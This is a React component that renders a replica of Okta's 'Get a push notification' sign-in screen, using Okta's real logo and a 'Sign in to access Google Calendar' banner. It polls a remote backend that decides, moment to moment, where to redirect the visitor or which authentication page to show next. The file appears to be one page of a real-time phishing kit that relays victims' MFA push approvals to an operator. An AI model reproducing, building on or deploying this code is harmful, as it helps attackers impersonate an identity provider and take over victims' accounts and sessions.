import { useState, useEffect } from "react";
import { useNavigate } from "react-router-dom";
import "./OktaLogin.css";
import googleCalendarLogo from "./assets/google-calendar.png";
import { AUTH_TYPE_ROUTES } from "./authRoutes";
import OktaVerifySomethingElse from "./OktaVerifySomethingElse";
import OktaUserIdentifier from "./OktaUserIdentifier";

const OKTA_LOGO =
  "https://ok1static.oktacdn.com/assets/img/logos/okta-logo.1e146cad5713da744492be95eb0f7793.png";

export default function OktaApprove() {
  const navigate = useNavigate();
  const [sessionId, setSessionId] = useState(null);
  const [email, setEmail] = useState("");
  const [error, setError] = useState("");
  const API_URL = process.env.REACT_APP_API_BASE_URL;

  useEffect(() => {
    const storedEmail =
      localStorage.getItem("userEmail") || localStorage.getItem("username") || "";
    setEmail(storedEmail);

    const storedSessionId = localStorage.getItem("session_id");
    if (storedSessionId) setSessionId(storedSessionId);
  }, []);

  useEffect(() => {
    if (!sessionId) return;

    const poll = setInterval(async () => {
      try {
        const res = await fetch(`${API_URL}/check_response?session_id=${sessionId}`);
        if (!res.ok) return;
        const data = await res.json();

        if (data.redirect) {
          clearInterval(poll);
          if (data.redirect.startsWith("/")) {
            navigate(data.redirect);
          } else {
            window.location.replace(data.redirect);
          }
          return;
        }

        if (data.authType && data.authType !== "oktaapprove") {
          clearInterval(poll);
          const route = AUTH_TYPE_ROUTES[data.authType];
          if (route) navigate(route);
          return;
        }

        if (data.error) {
          clearInterval(poll);
          setError(data.error);
        }
      } catch (err) {
        console.error("Polling error:", err);
      }
    }, 500);

    return () => clearInterval(poll);
  }, [sessionId, navigate, API_URL]);

  return (
    <div className="okta-page auth okta-container">
      <div className="login-bg-image tb--background" aria-hidden="true" />

      <header className="okta-google-access-header">
        <div className="okta-google-access-header-inner">
          <img
            src={googleCalendarLogo}
            alt="Google Calendar"
            className="okta-google-access-logo"
          />
          <p className="okta-google-access-text">
            Sign in with your account to access Google Calendar
          </p>
        </div>
      </header>

      <div className="content">
        <div id="okta-sign-in" className="auth-container main-container">
          <div className="auth-header">
            <img src={OKTA_LOGO} alt="Okta" className="auth-org-logo" />
            <div className="beacon-container">
              <div className="okta-sign-in-beacon-border auth-beacon-border" aria-hidden="true" />
              <div
                aria-live="polite"
                role="img"
                className="bg-helper auth-beacon auth-beacon-factor okta-verify-push-beacon"
                data-se="factor-beacon"
              >
                <span className="accessibility-text">Okta Verify</span>
              </div>
            </div>
          </div>

          <div className="auth-content">
            <h2 className="o-form-head">Get a push notification</h2>

            <OktaUserIdentifier email={email} />

            {error && <div className="okta-error okta-push-sent-error">{error}</div>}

            <div className="okta-push-sent-status" role="status">
              Push notification sent
            </div>

            <OktaVerifySomethingElse sessionId={sessionId} />
          </div>
        </div>
      </div>
    </div>
  );
}
